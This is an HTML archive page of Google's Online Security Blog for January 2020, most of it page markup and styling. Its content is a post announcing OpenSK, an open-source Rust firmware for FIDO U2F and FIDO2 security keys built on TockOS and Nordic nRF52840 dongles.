
Google Online Security Blog: January 2020

<!DOCTYPE html> <html class='v2 list-page' dir='ltr' itemscope='' itemtype='http://schema.org/Blog' lang='en' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'> <head> <link href='https://www.blogger.com/static/v1/widgets/3566091532-css_bundle_v2.css' rel='stylesheet' type='text/css'/> <title> Google Online Security Blog: January 2020 </title> <meta content='JPvErrROkJmNEh4Lr_QT6CD77GdfQr6cLFw6gIXg6kc' name='google-site-verification'/> <meta content='width=device-width, height=device-height, minimum-scale=1.0, initial-scale=1.0, user-scalable=0' name='viewport'/> <meta content='IE=Edge' http-equiv='X-UA-Compatible'/> <meta content='Google Online Security Blog' property='og:title'/> <meta content='en_US' property='og:locale'/> <meta content='https://security.googleblog.com/2020/01/' property='og:url'/> <meta content='Google Online Security Blog' property='og:site_name'/> <!-- Twitter Card properties --> <meta content='Google Online Security Blog' property='og:title'/> <meta content='summary' name='twitter:card'/> <meta content='@google' name='twitter:creator'/> <link href='https://fonts.googleapis.com/css?family=Roboto:400italic,400,500,500italic,700,700italic' rel='stylesheet' type='text/css'/> <link href='https://fonts.googleapis.com/icon?family=Material+Icons' rel='stylesheet'/> <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js' type='text/javascript'></script> <!-- End --> <style id='page-skin-1' type='text/css'><!-- /* <Group description="Header Color" selector="header"> <Variable name="header.background.color" description="Header Background" type="color" default="#ffffff"/> </Group> */ .header-outer { border-bottom: 1px solid #e0e0e0; background: #ffffff; } html, .Label h2, #sidebar .rss a, .BlogArchive h2, .FollowByEmail h2.title, .widget .post h2 { font-family: Roboto, sans-serif; } .plusfollowers 
h2.title, .post h2.title, .widget h2.title { font-family: Roboto, sans-serif; } .widget-item-control { height: 100%; } .widget.Header, #header { position: relative; height: 100%; width: 100%; } } .widget.Header .header-logo1 { float: left; margin-right: 15px; padding-right: 15px; border-right: 1px solid #ddd; } .header-title h2 { color: rgba(0,0,0,.54); display: inline-block; font-size: 40px; font-family: Roboto, sans-serif; font-weight: normal; line-height: 52px; vertical-align: top; } .header-inner { background-repeat: no-repeat; background-position: right 0px; } .post-author, .byline-author { font-size: 14px; font-weight: normal; color: #757575; color: rgba(0,0,0,.54); } .post-content .img-border { border: 1px solid rgb(235, 235, 235); padding: 4px; } .header-title a { text-decoration: none !important; } pre { border: 1px solid #bbbbbb; margin-top: 1em 0 0 0; padding: 0.99em; overflow-x: auto; overflow-y: auto; } pre, code { font-size: 9pt; background-color: #fafafa; line-height: 125%; font-family: monospace; } pre, code { color: #060; font: 13px/1.54 "courier new",courier,monospace; } .header-left .header-logo1 { width: 128px !important; } .header-desc { line-height: 20px; margin-top: 8px; } .fb-custom img, .twitter-custom img, .gplus-share img { cursor: pointer; opacity: 0.54; } .fb-custom img:hover, .twitter-custom img:hover, .gplus-share img:hover { opacity: 0.87; } .fb-like { width: 80px; } .post .share { float: right; } #twitter-share{ border: #CCC solid 1px; border-radius: 3px; background-image: -webkit-linear-gradient(top,#ffffff,#dedede); } .twitter-follow { background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzwq6wJ3u5K0MMYeWnx0AU03sYtGpFjNwKFUaQZBmEMv30yakbc2IPrWwifAH24rgztnZb9PxMbEOtABaf_viqKnZ_xTZxJCPc1W2GQGIkl4riZZg10bCTUMyHjOQz4_0Lg4l11kmyRa1I/s1600/twitter-bird.png) no-repeat left center; padding-left: 18px; font: normal normal normal 11px/18px 'Helvetica Neue',Arial,sans-serif; font-weight: bold; text-shadow: 0 1px 0 
rgba(255,255,255,.5); cursor: pointer; margin-bottom: 10px; } .twitter-fb { padding-top: 2px; } .fb-follow-button { background: -webkit-linear-gradient(#4c69ba, #3b55a0); background: -moz-linear-gradient(#4c69ba, #3b55a0); background: linear-gradient(#4c69ba, #3b55a0); border-radius: 2px; height: 18px; padding: 4px 0 0 3px; width: 57px; border: #4c69ba solid 1px; } .fb-follow-button a { text-decoration: none !important; text-shadow: 0 -1px 0 #354c8c; text-align: center; white-space: nowrap; font-size: 11px; color: white; vertical-align: top; } .fb-follow-button a:visited { color: white; } .fb-follow { padding: 0px 5px 3px 0px; width: 14px; vertical-align: bottom; } .gplus-wrapper { margin-top: 3px; display: inline-block; vertical-align: top; } .twitter-custom, .gplus-share { margin-right: 12px; } .fb-follow-button{ margin: 10px auto; } /** CUSTOM CODE **/ --></style> <style id='template-skin-1' type='text/css'><!-- .header-outer { clear: both; } .header-inner { margin: auto; padding: 0px; } .footer-outer { background: #f5f5f5; clear: both; margin: 0; } .footer-inner { margin: auto; padding: 0px; } .footer-inner-2 { /* Account for right hand column elasticity. */ max-width: calc(100% - 248px); } .google-footer-outer { clear: both; } .cols-wrapper, .google-footer-outer, .footer-inner, .header-inner { max-width: 978px; margin-left: auto; margin-right: auto; } .cols-wrapper { margin: auto; clear: both; margin-top: 60px; margin-bottom: 60px; overflow: hidden; } .col-main-wrapper { float: left; width: 100%; } .col-main { margin-right: 278px; max-width: 660px; } .col-right { float: right; width: 248px; margin-left: -278px; } /* Tweaks for layout mode. 
*/ body#layout .google-footer-outer { display: none; } body#layout .header-outer, body#layout .footer-outer { background: none; } body#layout .header-inner { height: initial; } body#layout .cols-wrapper { margin-top: initial; margin-bottom: initial; } --></style> <!-- start all head --> <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/> <meta content='blogger' name='generator'/> <link href='https://security.googleblog.com/favicon.ico' rel='icon' type='image/x-icon'/> <link href='https://security.googleblog.com/2020/01/' rel='canonical'/> <link rel="alternate" type="application/atom+xml" title="Google Online Security Blog - Atom" href="https://security.googleblog.com/feeds/posts/default" /> <link rel="alternate" type="application/rss+xml" title="Google Online Security Blog - RSS" href="https://security.googleblog.com/feeds/posts/default?alt=rss" /> <link rel="service.post" type="application/atom+xml" title="Google Online Security Blog - Atom" href="https://www.blogger.com/feeds/1176949257541686127/posts/default" /> <!--Can't find substitution for tag [blog.ieCssRetrofitLinks]--> <meta content='https://security.googleblog.com/2020/01/' property='og:url'/> <meta content='Google Online Security Blog' property='og:title'/> <meta content='The latest news and insights from Google on security and safety on the Internet' property='og:description'/> <!-- end all head --> <base target='_self'/> <style> html { font-family: Roboto, sans-serif; -moz-osx-font-smoothing: grayscale; -webkit-font-smoothing: antialiased; } body { padding: 0; /* This ensures that the scroll bar is always present, which is needed */ /* because content render happens after page load; otherwise the header */ /* would "bounce" in-between states. 
*/ min-height: 150%; } h2 { font-size: 16px; } h1, h2, h3, h4, h5 { line-height: 2em; } html, h4, h5, h6 { font-size: 14px; } a, a:visited { color: #4184F3; text-decoration: none; } a:focus, a:hover, a:active { text-decoration: none; } .Header { margin-top: 15px; } .Header h1 { font-size: 32px; font-weight: 300; line-height: 32px; height: 42px; } .header-inner .Header .titlewrapper { padding: 0; margin-top: 30px; } .header-inner .Header .descriptionwrapper { padding: 0; margin: 0; } .cols-wrapper { margin-top: 56px; } .header-outer, .cols-wrapper, .footer-outer, .google-footer-outer { padding: 0 60px; } .header-inner { height: 256px; position: relative; } html, .header-inner a { color: #212121; color: rgba(0,0,0,.87); } .header-inner .google-logo { display: inline-block; background-size: contain; z-index: 1; height: 46px; overflow: hidden; margin-top: 4px; margin-right: 8px; } .header-left { position: absolute; top: 50%; -webkit-transform: translateY(-50%); transform: translateY(-50%); margin-top: 12px; width: 100%; } .google-logo { margin-left: -4px; } #google-footer { position: relative; font-size: 13px; list-style: none; text-align: right; } #google-footer a { color: #444; } #google-footer ul { margin: 0; padding: 0; height: 144px; line-height: 144px; } #google-footer ul li { display: inline; } #google-footer ul li:before { color: #999; content: "\00b7"; font-weight: bold; margin: 5px; } #google-footer ul li:first-child:before { content: ''; } #google-footer .google-logo-dark { left: 0; margin-top: -16px; position: absolute; top: 50%; } /** Sitemap links. 
**/ .footer-inner-2 { font-size: 14px; padding-top: 42px; padding-bottom: 74px; } .footer-inner-2 .HTML h2 { color: #212121; color: rgba(0,0,0,.87); font-size: 14px; font-weight: 500; padding-left: 0; margin: 10px 0; } .footer-inner-2 .HTML ul { font-weight: normal; list-style: none; padding-left: 0; } .footer-inner-2 .HTML li { line-height: 24px; padding: 0; } .footer-inner-2 li a { color: rgba(65,132,243,.87); } /** Archive widget. **/ .BlogArchive { font-size: 13px; font-weight: normal; } .BlogArchive .widget-content { display: none; } .BlogArchive h2, .Label h2 { color: #4184F3; text-decoration: none; } .BlogArchive .hierarchy li { display: inline-block; } /* Specificity needed here to override widget CSS defaults. */ .BlogArchive #ArchiveList ul li, .BlogArchive #ArchiveList ul ul li { margin: 0; padding-left: 0; text-indent: 0; } .BlogArchive .intervalToggle { cursor: pointer; } .BlogArchive .expanded .intervalToggle .new-toggle { -ms-transform: rotate(180deg); transform: rotate(180deg); } .BlogArchive .new-toggle { float: right; padding-top: 3px; opacity: 0.87; } #ArchiveList { text-transform: uppercase; } #ArchiveList .expanded > ul:last-child { margin-bottom: 16px; } #ArchiveList .archivedate { width: 100%; } /* Months */ .BlogArchive .items { max-width: 150px; margin-left: -4px; } .BlogArchive .expanded .items { margin-bottom: 10px; overflow: hidden; } .BlogArchive .items > ul { float: left; height: 32px; } .BlogArchive .items a { padding: 0 4px; } .Label { font-size: 13px; font-weight: normal; } .sidebar-icon { display: inline-block; width: 24px; height: 24px; vertical-align: middle; margin-right: 12px; margin-top: -1px } .Label a { margin-right: 4px; } .Label .widget-content { display: none; } .FollowByEmail { font-size: 13px; font-weight: normal; } .FollowByEmail h2 { background: url(""); background-repeat: no-repeat; background-position: 0 50%; text-indent: 30px; } .FollowByEmail .widget-content { display: none; } .searchBox input { border: 1px solid 
#eee; color: #212121; color: rgba(0,0,0,.87); font-size: 14px; padding: 8px 8px 8px 40px; width: 164px; font-family: Roboto, sans-serif; background: url("https://www.gstatic.com/images/icons/material/system/1x/search_grey600_24dp.png") 8px center no-repeat; } .searchBox ::-webkit-input-placeholder { /* WebKit, Blink, Edge */ color: rgba(0,0,0,.54); } .searchBox :-moz-placeholder { /* Mozilla Firefox 4 to 18 */ color: #000; opacity: 0.54; } .searchBox ::-moz-placeholder { /* Mozilla Firefox 19+ */ color: #000; opacity: 0.54; } .searchBox :-ms-input-placeholder { /* Internet Explorer 10-11 */ color: #757575; } .widget-item-control { margin-top: 0px; } .section { margin: 0; padding: 0; } #sidebar-top { border: 1px solid #eee; } #sidebar-top > div { margin: 16px 0; } .widget ul { line-height: 1.6; } /*main post*/ .post { margin-bottom:30px; } #main .post .title { margin: 0; } #main .post .title a { color: #212121; color: rgba(0,0,0,.87); font-weight: normal; font-size: 24px; } #main .post .title a:hover { text-decoration:none; color:#4184F3; } .message, #main .post .post-header { margin: 0; padding: 0; } #main .post .post-header .caption, #main .post .post-header .labels-caption, #main .post .post-footer .caption, #main .post .post-footer .labels-caption { color: #444; font-weight: 500; } #main .tr-caption-container td { text-align: left; } #main .post .tr-caption { color: #757575; color: rgba(0,0,0,.54); display: block; max-width: 560px; padding-bottom: 20px; } #main .post .tr-caption-container { line-height: 24px; margin: -1px 0 0 0 !important; padding: 4px 0; text-align: left; } #main .post .post-header .published{ font-size:11px; font-weight:bold; } .post-header .publishdate { font-size: 17px; font-weight:normal; color: #757575; color: rgba(0,0,0,.54); } #main .post .post-footer{ font-size:12px; padding-bottom: 21px; } .label-footer { margin-bottom: 12px; margin-top: 12px; } .comment-img { margin-right: 16px; opacity: 0.54; vertical-align: middle; } #main .post 
.post-header .published { margin-bottom: 40px; margin-top: -2px; } .post .post-content { color: #212121; color: rgba(0,0,0,.87); font-size: 17px; margin: 25px 0 36px 0; line-height: 32px; } .post-body .post-content ul, .post-body .post-content ol { margin: 16px 0; padding: 0 48px; } .post-summary { display: none; } /* Another old-style caption. */ .post-content div i, .post-content div + i { font-size: 14px; font-style: normal; color: #757575; color: rgba(0,0,0,.54); display: block; line-height: 24px; margin-bottom: 16px; text-align: left; } /* Another old-style caption (with link) */ .post-content a > i { color: #4184F3 !important; } /* Old-style captions for images. */ .post-content .separator + div:not(.separator) { margin-top: -16px; } /* Capture section headers. */ .post-content br + br + b, .post-content .space + .space + b, .post-content .separator + b { display: inline-block; margin-bottom: 8px; margin-top: 24px; } .post-content li { line-height: 32px; } /* Override all post images/videos to left align. */ .post-content .separator > a, .post-content .separator > span { margin-left: 0 !important; } .post-content img { max-width: 100%; height: auto; width: auto; } .post-content .tr-caption-container img { margin-bottom: 12px; } .post-content iframe, .post-content embed { max-width: 100%; } .post-content .carousel-container { margin-bottom: 48px; } #main .post-content b { font-weight: 500; } /* These are the main paragraph spacing tweaks. 
*/ #main .post-content br { content: ' '; display: block; padding: 4px; } .post-content .space { display: block; height: 8px; } .post-content iframe + .space, .post-content iframe + br { padding: 0 !important; } #main .post .jump-link { margin-bottom:10px; } .post-content img, .post-content iframe { margin: 30px 0 20px 0; } .post-content > img:first-child, .post-content > iframe:first-child { margin-top: 0; } .col-right .section { padding: 0 16px; } #aside { background:#fff; border:1px solid #eee; border-top: 0; } #aside .widget { margin:0; } #aside .widget h2, #ArchiveList .toggle + a.post-count-link { color: #212121; color: rgba(0,0,0,.87); font-weight: 400 !important; margin: 0; } #ArchiveList .toggle { float: right; } #ArchiveList .toggle .material-icons { padding-top: 4px; } #sidebar .tab { cursor: pointer; } #sidebar .tab .arrow { display: inline-block; float: right; } #sidebar .tab .icon { display: inline-block; vertical-align: top; height: 24px; width: 24px; margin-right: 13px; margin-left: -1px; margin-top: 1px; color: #757575; color: rgba(0,0,0,.54); } #sidebar .widget-content > :first-child { padding-top: 8px; } #sidebar .active .tab .arrow { -ms-transform: rotate(180deg); transform: rotate(180deg); } #sidebar .arrow { color: #757575; color: rgba(0,0,0,.54); } #sidebar .widget h2 { font-size: 14px; line-height: 24px; display: inline-block; } #sidebar .widget .BlogArchive { padding-bottom: 8px; } #sidebar .widget { border-bottom: 1px solid #eee; box-shadow: 0px 1px 0 white; margin-bottom: 0; padding: 14px 0; min-height: 20px; } #sidebar .widget:last-child { border-bottom: none; box-shadow: none; margin-bottom: 0; } #sidebar ul { margin: 0; padding: 0; } #sidebar ul li { list-style:none; padding:0; } #sidebar ul li a { line-height: 32px; } #sidebar .archive { background-image: url(""); height: 24px; line-height: 24px; padding-left: 30px; } #sidebar .labels { background-image: url(""); height: 20px; line-height: 20px; padding-left: 30px; } #sidebar .rss a { 
background-image: url(""); } #sidebar .subscription a { background-image: url(""); } #sidebar-bottom { background: #f5f5f5; border-top:1px solid #eee; } #sidebar-bottom .widget { border-bottom: 1px solid #e0e0e0; padding: 15px 0; text-align: center; } #sidebar-bottom > div:last-child { border-bottom: 0; } #sidebar-bottom .text { line-height: 20px; } /* Home, forward, and backward pagination. */ .blog-pager { border-top : 1px #e0e0e0 solid; padding-top: 10px; margin-top: 15px; text-align: right !important; } #blog-pager { margin-botom: 0; margin-top: -14px; padding: 16px 0 0 0; } #blog-pager a { display: inline-block; } .blog-pager i.disabled { opacity: 0.2 !important; } .blog-pager i { color: black; margin-left: 16px; opacity: 0.54; } .blog-pager i:hover, .blog-pager i:active { opacity: 0.87; } #blog-pager-older-link, #blog-pager-newer-link { float: none; } .gplus-profile { background-color: #fafafa; border: 1px solid #eee; overflow: hidden; width: 212px; } .gplus-profile-inner { margin-left: -1px; margin-top: -1px; } /* Sidebar follow buttons. */ .followgooglewrapper { padding: 12px 0 0 0; } .loading { visibility: hidden; } .detail-page .post-footer .cmt_iframe_holder { padding-top: 40px !important; } /** Desktop **/ @media (max-width: 900px) { .col-right { display: none; } .col-main { margin-right: 0; min-width: initial; } .footer-outer { display: none; } .cols-wrapper { min-width: initial; } .google-footer-outer { background-color: #f5f5f5; } } /** Tablet **/ @media (max-width: 712px) { .header-outer, .cols-wrapper, .footer-outer, .google-footer-outer { padding: 0 40px; } } /* An extra breakpoint accommodating for long blog titles. 
*/ @media (max-width: 600px) { .header-left { height: 100%; top: inherit; margin-top: 0; -webkit-transform: initial; transform: initial; } .header-title { margin-top: 18px; } .header-inner .google-logo { height: 40px; margin-top: 3px; } .header-inner .google-logo img { height: 42px; } .header-title h2 { font-size: 32px; line-height: 40px; } .header-desc { bottom: 24px; position: absolute; } } /** Mobile/small desktop window; also landscape. **/ @media (max-width: 480px), (max-height: 480px) { .header-outer, .cols-wrapper, .footer-outer, .google-footer-outer { padding: 0 16px; } .cols-wrapper { margin-top: 0; } .post-header .publishdate, .post .post-content { font-size: 16px; } .post .post-content { line-height: 28px; margin-bottom: 30px; } .post { margin-top: 30px; } .byline-author { display: block; font-size: 12px; line-height: 24px; margin-top: 6px; } #main .post .title a { font-weight: 500; color: #4c4c4c; color: rgba(0,0,0,.70); } #main .post .post-header { padding-bottom: 12px; } #main .post .post-header .published { margin-bottom: -8px; margin-top: 3px; } .post .read-more { display: block; margin-top: 14px; } .post .tr-caption { font-size: 12px; } #main .post .title a { font-size: 20px; line-height: 30px; } .post-content iframe { /* iframe won't keep aspect ratio when scaled down. */ max-height: 240px; } .post-content .separator img, .post-content .tr-caption-container img, .post-content iframe { margin-left: -16px; max-width: inherit; width: calc(100% + 32px); } .post-content table, .post-content td { width: 100%; } #blog-pager { margin: 0; padding: 16px 0; } /** List page tweaks. 
**/ .list-page .post-original { display: none; } .list-page .post-summary { display: block; } .list-page .comment-container { display: none; } .list-page #blog-pager { padding-top: 0; border: 0; margin-top: -8px; } .list-page .label-footer { display: none; } .list-page #main .post .post-footer { border-bottom: 1px solid #eee; margin: -16px 0 0 0; padding: 0 0 20px 0; } .list-page .post .share { display: none; } /** Detail page tweaks. **/ .detail-page .post-footer .cmt_iframe_holder { padding-top: 32px !important; } .detail-page .label-footer { margin-bottom: 0; } .detail-page #main .post .post-footer { padding-bottom: 0; } .detail-page #comments { display: none; } } [data-about-pullquote], [data-is-preview], [data-about-syndication] { display: none; } </style> <noscript> <style> .loading { visibility: visible }</style> </noscript> <!-- Google tag (gtag.js) --> <script async='true' src='https://www.googletagmanager.com/gtag/js?id=G-K46T604G22'></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-K46T604G22'); </script> <link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1176949257541686127&amp;zx=82a7f4cd-b217-4761-bf81-053c33f91622' media='none' onload='if(media!=&#39;all&#39;)media=&#39;all&#39;' rel='stylesheet'/><noscript><link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1176949257541686127&amp;zx=82a7f4cd-b217-4761-bf81-053c33f91622' rel='stylesheet'/></noscript> <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/> <meta name='google-adsense-platform-domain' content='blogspot.com'/> </head> <body> <script type='text/javascript'> //<![CDATA[ var axel = Math.random() + ""; var a = axel * 10000000000000; document.write('<iframe src="https://2542116.fls.doubleclick.net/activityi;src=2542116;type=gblog;cat=googl0;ord=ord=' + a + '?" 
width="1" height="1" frameborder="0" style="display:none"></iframe>'); //]]> </script> <noscript> <img alt='' height='1' src='https://ad.doubleclick.net/ddm/activity/src=2542116;type=gblog;cat=googl0;ord=1?' width='1'/> </noscript> <!-- Header --> <div class='header-outer'> <div class='header-inner'> <div class='section' id='header'><div class='widget Header' data-version='1' id='Header1'> <div class='header-left'> <div class='header-title'> <a class='google-logo' href='https://security.googleblog.com/'> <img height='50' src='https://www.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png'/> </a> <a href='/.'> <h2> Security Blog </h2> </a> </div> <div class='header-desc'> The latest news and insights from Google on security and safety on the Internet </div> </div> </div></div> </div> </div> <!-- all content wrapper start --> <div class='cols-wrapper loading'> <div class='col-main-wrapper'> <div class='col-main'> <div class='section' id='main'><div class='widget Blog' data-version='1' id='Blog1'> <div class='post' data-id='991058832846546625' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html' itemprop='url' title='Say hello to OpenSK: a fully open-source security key implementation'> Say hello to OpenSK: a fully open-source security key implementation </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 30, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Elie Bursztein, Security &amp; Anti-abuse Research Lead, and Jean-Michel Picod, Software Engineer, Google&nbsp;</span><br /> <span class="byline-author"><br /></span> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> Today, <a 
href="https://fidoalliance.org/how-fido-works/">FIDO</a> security keys are reshaping the way online accounts are protected by providing an easy, phishing-resistant form of two-factor authentication (2FA) that is trusted by a growing number of websites, including Google, social networks, cloud providers, and many others. To help advance and improve access to FIDO authenticator implementations, we are excited, following other open-source projects like Solo and Somu, to announce the release of <a href="https://github.com/google/OpenSK">OpenSK</a>, an open-source implementation for security keys written in <a href="https://www.rust-lang.org/">Rust</a> that supports both FIDO U2F and FIDO2 standards. <br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-jQvZmprkkOU/XjL4iBkvbgI/AAAAAAAABgo/khrdiLFzrCw7hCv23OcIuxHxD6RQZZwDwCNcBGAsYHQ/s1600/unnamed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="512" height="225" src="https://1.bp.blogspot.com/-jQvZmprkkOU/XjL4iBkvbgI/AAAAAAAABgo/khrdiLFzrCw7hCv23OcIuxHxD6RQZZwDwCNcBGAsYHQ/s400/unnamed.jpg" width="400" /></a></div> <div style="text-align: center;"> <b>Photo of OpenSK developer edition: a Nordic Dongle running the OpenSK firmware on DIY case</b></div> <div style="text-align: left;"> <br /></div> By opening up OpenSK as a research platform, our hope is that it will be used by researchers, security key manufacturers, and enthusiasts to help develop innovative features and accelerate security key adoption.<br /> <br /> With this early release of OpenSK, you can make your own developer key by flashing the OpenSK firmware on a <a href="https://www.nordicsemi.com/About-us/BuyOnline?search_token=nRF52840%20Dongle&amp;series_token=nRF52840">Nordic chip dongle</a>. 
In addition to being affordable, we chose Nordic as initial reference hardware because it supports all major transport protocols mentioned by <a href="https://fidoalliance.org/specs/fido-v2.0-ps-20190130/fido-client-to-authenticator-protocol-v2.0-ps-20190130.html#transport-specific-bindings">FIDO2</a>: NFC, Bluetooth Low Energy, USB, and a dedicated hardware crypto core. To protect and carry your key, we are also providing a <a href="https://www.thingiverse.com/thing:4132768">custom, 3D-printable case</a> that works on a variety of printers.<br /> <br /> &#8220;We&#8217;re excited to collaborate with Google and the open source community on the new OpenSK research platform,&#8221; said Kjetil Holstad, Director of Product Management at Nordic Semiconductor. &#8220;We hope that our industry leading nRF52840&#8217;s native support for secure cryptographic acceleration combined with new features and testing in OpenSK will help the industry gain mainstream adoption of security keys.&#8221; <br /> <div> <br /> <div class="separator" style="clear: both; text-align: center;"> <iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/klEozvpw0xg/0.jpg" src="https://www.youtube.com/embed/klEozvpw0xg?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div> While you can make your own fully functional FIDO authenticator today, as showcased in the video above, this release should be considered an experimental research project to be used for testing and research purposes.</div> <br /> <br /> Under the hood, OpenSK is written in <a href="https://www.rust-lang.org/">Rust</a> and runs on <a href="https://www.tockos.org/">TockOS</a> to provide better isolation and cleaner OS abstractions in support of security. Rust&#8217;s strong memory safety and zero-cost abstractions make the code less vulnerable to logical attacks. 
<a href="https://www.tockos.org/documentation/design">TockOS, with its sandboxed architecture</a>, offers the isolation between the security key applet, the drivers, and kernel that is needed to build defense-in-depth. Our TockOS contributions, including our <a href="https://github.com/tock/tock/pull/1467">flash-friendly storage system</a> and <a href="https://github.com/tock/tock/pulls?q=is%3Apr+author%3Agendx">patches</a>, have all been upstreamed to the TockOS repository. We&#8217;ve done this to encourage everyone to build upon the work.<br /> <div> <br /></div> <div> <br /> <b>How to get involved and contribute to OpenSK&nbsp;</b><br /> <div> <br /></div> <div> To learn more about OpenSK and how to experiment with making your own security key, you can check out our <a href="https://github.com/google/OpenSK">GitHub repository</a> today. With the help of the research and developer communities, we hope OpenSK over time will bring innovative features, stronger embedded crypto, and encourage widespread adoption of trusted phishing-resistant tokens and a passwordless web.<br /> <b><br /></b> <b>Acknowledgements</b><br /> <br /> We also want to thank our OpenSK collaborators: Adam Langley, Alexei Czeskis, Arnar Birgisson, Borbala Benko, Christiaan Brand, Dirk Balfanz, Dominic Rizzo, Fabian Kaczmarczyck, Guillaume Endignoux, Jeff Hodges, Julien Cretin, Mark Risher, Oxana Comanescu, Tadek Pietraszek</div> </div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Elie Bursztein, Security &amp; Anti-abuse Research Lead, and Jean-Michel Picod, Software Engineer, Google&nbsp;</span><br /> <span class="byline-author"><br /></span> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> Today, <a href="https://fidoalliance.org/how-fido-works/">FIDO</a> security keys are 
reshaping the way online accounts are protected by providing an easy, phishing-resistant form of two-factor authentication (2FA) that is trusted by a growing number of websites, including Google, social networks, cloud providers, and many others. To help advance and improve access to FIDO authenticator implementations, we are excited, following other open-source projects like Solo and Somu, to announce the release of <a href="https://github.com/google/OpenSK">OpenSK</a>, an open-source implementation for security keys written in <a href="https://www.rust-lang.org/">Rust</a> that supports both FIDO U2F and FIDO2 standards. <br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-jQvZmprkkOU/XjL4iBkvbgI/AAAAAAAABgo/khrdiLFzrCw7hCv23OcIuxHxD6RQZZwDwCNcBGAsYHQ/s1600/unnamed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="512" height="225" src="https://1.bp.blogspot.com/-jQvZmprkkOU/XjL4iBkvbgI/AAAAAAAABgo/khrdiLFzrCw7hCv23OcIuxHxD6RQZZwDwCNcBGAsYHQ/s400/unnamed.jpg" width="400" /></a></div> <div style="text-align: center;"> <b>Photo of OpenSK developer edition: a Nordic Dongle running the OpenSK firmware on DIY case</b></div> <div style="text-align: left;"> <br /></div> By opening up OpenSK as a research platform, our hope is that it will be used by researchers, security key manufacturers, and enthusiasts to help develop innovative features and accelerate security key adoption.<br /> <br /> With this early release of OpenSK, you can make your own developer key by flashing the OpenSK firmware on a <a href="https://www.nordicsemi.com/About-us/BuyOnline?search_token=nRF52840%20Dongle&amp;series_token=nRF52840">Nordic chip dongle</a>. 
In addition to being affordable, we chose Nordic as initial reference hardware because it supports all major transport protocols mentioned by <a href="https://fidoalliance.org/specs/fido-v2.0-ps-20190130/fido-client-to-authenticator-protocol-v2.0-ps-20190130.html#transport-specific-bindings">FIDO2</a>: NFC, Bluetooth Low Energy, USB, and a dedicated hardware crypto core. To protect and carry your key, we are also providing a <a href="https://www.thingiverse.com/thing:4132768">custom, 3D-printable case</a> that works on a variety of printers.<br /> <br /> &#8220;We&#8217;re excited to collaborate with Google and the open source community on the new OpenSK research platform,&#8221; said Kjetil Holstad, Director of Product Management at Nordic Semiconductor. &#8220;We hope that our industry leading nRF52840&#8217;s native support for secure cryptographic acceleration combined with new features and testing in OpenSK will help the industry gain mainstream adoption of security keys.&#8221; <br /> <div> <br /> <div class="separator" style="clear: both; text-align: center;"> <iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/klEozvpw0xg/0.jpg" src="https://www.youtube.com/embed/klEozvpw0xg?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div> While you can make your own fully functional FIDO authenticator today, as showcased in the video above, this release should be considered an experimental research project to be used for testing and research purposes.</div> <br /> <br /> Under the hood, OpenSK is written in <a href="https://www.rust-lang.org/">Rust</a> and runs on <a href="https://www.tockos.org/">TockOS</a> to provide better isolation and cleaner OS abstractions in support of security. Rust&#8217;s strong memory safety and zero-cost abstractions make the code less vulnerable to logical attacks. 
<a href="https://www.tockos.org/documentation/design">TockOS, with its sandboxed architecture</a>, offers the isolation between the security key applet, the drivers, and kernel that is needed to build defense-in-depth. Our TockOS contributions, including our <a href="https://github.com/tock/tock/pull/1467">flash-friendly storage system</a> and <a href="https://github.com/tock/tock/pulls?q=is%3Apr+author%3Agendx">patches</a>, have all been upstreamed to the TockOS repository. We&#8217;ve done this to encourage everyone to build upon the work.<br /> <div> <br /></div> <div> <br /> <b>How to get involved and contribute to OpenSK&nbsp;</b><br /> <div> <br /></div> <div> To learn more about OpenSK and how to experiment with making your own security key, you can check out our <a href="https://github.com/google/OpenSK">GitHub repository</a> today. With the help of the research and developer communities, we hope OpenSK over time will bring innovative features, stronger embedded crypto, and encourage widespread adoption of trusted phishing-resistant tokens and a passwordless web.<br /> <b><br /></b> <b>Acknowledgements</b><br /> <br /> We also want to thank our OpenSK collaborators: Adam Langley, Alexei Czeskis, Arnar Birgisson, Borbala Benko, Christiaan Brand, Dirk Balfanz, Dominic Rizzo, Fabian Kaczmarczyck, Guillaume Endignoux, Jeff Hodges, Julien Cretin, Mark Risher, Oxana Comanescu, Tadek Pietraszek</div> </div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:Say hello to OpenSK: a fully open-source security key implementation&url=https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html&via=google'> <img 